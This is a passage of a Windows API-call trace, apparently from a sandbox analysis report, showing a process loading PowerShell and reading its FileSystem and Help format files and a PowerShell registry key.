Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.233] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.233] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.234] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.234] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.234] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x8d26e548, Data2=0xe75, Data3=0x4690, Data4=([0]=0x83, [1]=0x38, [2]=0xbe, [3]=0x86, [4]=0x1d, [5]=0xee, [6]=0xb6, [7]=0x41))) returned 0x0 [0103.235] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x939a42a, Data2=0x1aa7, Data3=0x4915, Data4=([0]=0x81, [1]=0xa2, [2]=0x3a, [3]=0x92, [4]=0x25, [5]=0x94, [6]=0xf8, [7]=0x1e))) returned 0x0 [0103.235] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa6a99d46, Data2=0xc610, Data3=0x4304, Data4=([0]=0xa0, [1]=0x67, [2]=0xae, [3]=0x16, [4]=0xc8, [5]=0x92, [6]=0x3a, [7]=0x67))) returned 0x0 [0103.235] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xe494373b, Data2=0x1a82, Data3=0x4a1d, Data4=([0]=0xa3, [1]=0xb8, [2]=0x95, [3]=0x9e, [4]=0xe6, [5]=0x8e, [6]=0x99, [7]=0xba))) returned 0x0 [0103.235] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x48a7b03c, Data2=0x82d, Data3=0x4ed0, Data4=([0]=0xa4, [1]=0x7e, [2]=0x2b, [3]=0x61, [4]=0x0, [5]=0x39, [6]=0xb0, [7]=0x12))) returned 0x0 [0103.235] VirtualQuery (in: lpAddress=0x1abc60, lpBuffer=0x1acb20, dwLength=0x30 | out: lpBuffer=0x1acb20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.236] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x9a6f46d2, Data2=0xdbbf, Data3=0x420c, Data4=([0]=0x8a, [1]=0x22, [2]=0x3a, [3]=0x9b, [4]=0x19, [5]=0xba, [6]=0x4c, [7]=0xca))) returned 0x0 [0103.236] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa3e83e41, Data2=0x5a27, Data3=0x41f9, Data4=([0]=0x8c, [1]=0xdd, [2]=0xb3, [3]=0xf8, [4]=0x70, [5]=0x5a, [6]=0xf9, [7]=0x1e))) returned 0x0 [0103.236] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7ce0a2a5, Data2=0xb8d7, Data3=0x43a5, Data4=([0]=0x88, [1]=0x35, [2]=0x2, [3]=0x1a, [4]=0x2f, [5]=0x65, [6]=0xa2, [7]=0x13))) returned 0x0 [0103.236] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x5d9594fe, Data2=0x81a8, Data3=0x4ec3, Data4=([0]=0xab, [1]=0x64, [2]=0xa7, [3]=0xa0, [4]=0x78, [5]=0xe6, [6]=0x9b, [7]=0x50))) returned 0x0 [0103.236] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xdc56b17a, Data2=0xcfa4, Data3=0x4451, Data4=([0]=0xb5, [1]=0x8, [2]=0xa2, [3]=0xd2, [4]=0x29, [5]=0xe7, [6]=0xb8, [7]=0xf0))) returned 0x0 [0103.237] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf9ec9ba5, Data2=0x27ae, Data3=0x4858, Data4=([0]=0x83, [1]=0xc9, [2]=0xcd, [3]=0x5, [4]=0x54, [5]=0x58, [6]=0xc1, [7]=0x9b))) returned 0x0 [0103.237] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xb057212f, Data2=0x5b40, Data3=0x48e3, Data4=([0]=0xa8, [1]=0x1e, [2]=0x5d, [3]=0x2c, [4]=0x17, [5]=0x82, [6]=0xe2, [7]=0x3c))) returned 0x0 [0103.237] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7b7568f6, Data2=0x6c97, Data3=0x46ef, Data4=([0]=0xaa, [1]=0x7c, [2]=0x9a, [3]=0xea, [4]=0x51, [5]=0x4f, [6]=0x5b, [7]=0xb))) returned 0x0 [0103.237] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x8284d23c, Data2=0x1727, Data3=0x4bf3, Data4=([0]=0xad, [1]=0x9b, [2]=0x5e, [3]=0xbb, [4]=0x60, [5]=0xb6, [6]=0xf2, [7]=0xd8))) returned 0x0 [0103.237] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xdbf7470, Data2=0x77e4, Data3=0x409a, Data4=([0]=0x9e, [1]=0xf9, [2]=0x78, [3]=0x69, [4]=0x99, [5]=0x8a, [6]=0x77, [7]=0x66))) returned 0x0 [0103.238] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x98a7b28e, Data2=0xb750, Data3=0x4d4b, Data4=([0]=0xbb, [1]=0x3b, [2]=0x3c, [3]=0x28, [4]=0x0, [5]=0x50, [6]=0xca, [7]=0xf9))) returned 0x0 [0103.238] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf2ea0575, Data2=0xe7ec, Data3=0x4d06, Data4=([0]=0x93, [1]=0xe8, [2]=0xf9, [3]=0xf4, [4]=0xf, [5]=0xaa, [6]=0x72, [7]=0x42))) returned 0x0 [0103.238] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xd9564cf9, Data2=0x5e70, Data3=0x4439, Data4=([0]=0xad, [1]=0x2c, [2]=0x3f, [3]=0xff, [4]=0x5b, [5]=0x7, [6]=0xbe, [7]=0x7d))) returned 0x0 [0103.238] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa91abd97, Data2=0xda4a, Data3=0x4c52, Data4=([0]=0x87, [1]=0x73, [2]=0x41, [3]=0x22, [4]=0x3e, [5]=0x76, [6]=0x4c, [7]=0x82))) returned 0x0 [0103.238] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x88217c73, Data2=0xfa1a, Data3=0x440c, Data4=([0]=0xb1, [1]=0xa0, [2]=0x1e, [3]=0x51, [4]=0xad, [5]=0xd7, [6]=0x3c, [7]=0x47))) returned 0x0 [0103.238] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6b8ec6f, Data2=0xd9ca, Data3=0x4abd, Data4=([0]=0xad, [1]=0x92, [2]=0x88, [3]=0x75, [4]=0x28, [5]=0xd8, [6]=0x2, [7]=0xd2))) returned 0x0 [0103.239] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x49917db, Data2=0x1279, Data3=0x4456, Data4=([0]=0xb4, [1]=0xa7, [2]=0x6b, [3]=0x8d, [4]=0xa8, [5]=0x19, [6]=0x18, [7]=0xbf))) returned 0x0 [0103.239] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x80a86ace, Data2=0xec78, Data3=0x449c, Data4=([0]=0x96, [1]=0x19, [2]=0x13, [3]=0x5d, [4]=0x0, [5]=0xd9, [6]=0x78, [7]=0x6f))) returned 0x0 [0103.239] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa601848d, Data2=0x8def, Data3=0x402f, Data4=([0]=0x85, [1]=0xfe, [2]=0x74, [3]=0xb, [4]=0xd6, [5]=0xb1, [6]=0x6c, [7]=0xd3))) returned 0x0 [0103.239] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.239] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.240] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.241] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xafe43693, Data2=0xb8c9, Data3=0x4826, Data4=([0]=0xbf, [1]=0x24, [2]=0xa5, [3]=0x85, [4]=0x43, [5]=0x2e, [6]=0x60, [7]=0x6e))) returned 0x0 [0103.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0103.242] SetErrorMode (uMode=0x1) returned 0x1 [0103.242] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.242] GetFileType (hFile=0x308) returned 0x1 [0103.242] SetErrorMode (uMode=0x1) returned 0x1 [0103.242] GetFileType (hFile=0x308) returned 0x1 [0103.242] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.243] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.244] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.244] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.245] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.245] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.245] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x119, lpOverlapped=0x0) returned 1 [0103.246] ReadFile (in: hFile=0x308, lpBuffer=0x34f64a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x34f64a0*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0103.246] SetErrorMode (uMode=0x1) returned 0x1 [0103.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0103.246] SetErrorMode (uMode=0x1) returned 0x1 [0103.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0103.246] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.246] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.246] CoTaskMemAlloc (cb=0x5a) returned 0x1b753fe0 [0103.246] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x1b753fe0, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.247] CoTaskMemFree (pv=0x1b753fe0) [0103.247] RegCloseKey (hKey=0x308) returned 0x0 [0103.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0103.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0103.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.249] VirtualQuery (in: lpAddress=0x1ab860, lpBuffer=0x1ac720, dwLength=0x30 | out: lpBuffer=0x1ac720*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.249] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa04d7b0d, Data2=0x256a, Data3=0x48a3, Data4=([0]=0xa6, [1]=0xef, [2]=0x70, [3]=0xda, [4]=0xf, [5]=0xde, [6]=0xc9, [7]=0xf5))) returned 0x0 [0103.249] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.250] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xab91e6b6, Data2=0xd69f, Data3=0x4b78, Data4=([0]=0xad, [1]=0xfa, [2]=0xd7, [3]=0x50, [4]=0x7c, [5]=0x1b, [6]=0xa8, [7]=0xb9))) returned 0x0 [0103.250] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x243d8728, Data2=0x3aba, Data3=0x49ea, Data4=([0]=0xb7, [1]=0xcc, [2]=0x65, [3]=0x56, [4]=0x13, [5]=0xdc, [6]=0x28, [7]=0x65))) returned 0x0 [0103.250] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x9bccb179, Data2=0x97e, Data3=0x43b4, Data4=([0]=0x9b, [1]=0x9, [2]=0x89, [3]=0xf6, [4]=0xbd, [5]=0x77, [6]=0xde, [7]=0x79))) returned 0x0 [0103.250] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.251] VirtualQuery (in: lpAddress=0x1ab9a0, lpBuffer=0x1ac860, dwLength=0x30 | out: lpBuffer=0x1ac860*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0103.251] SetErrorMode (uMode=0x1) returned 0x1 [0103.251] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.251] GetFileType (hFile=0x308) returned 0x1 [0103.251] SetErrorMode (uMode=0x1) returned 0x1 [0103.251] GetFileType (hFile=0x308) returned 0x1 [0103.251] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.253] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.253] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.253] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.254] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.255] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.255] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.255] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.257] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.257] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.257] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.257] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.258] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.258] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.258] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.258] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.260] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3552640*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.261] ReadFile (in: hFile=0x308, lpBuffer=0x3552640, nNumberOfBytesToRead=0x1000, 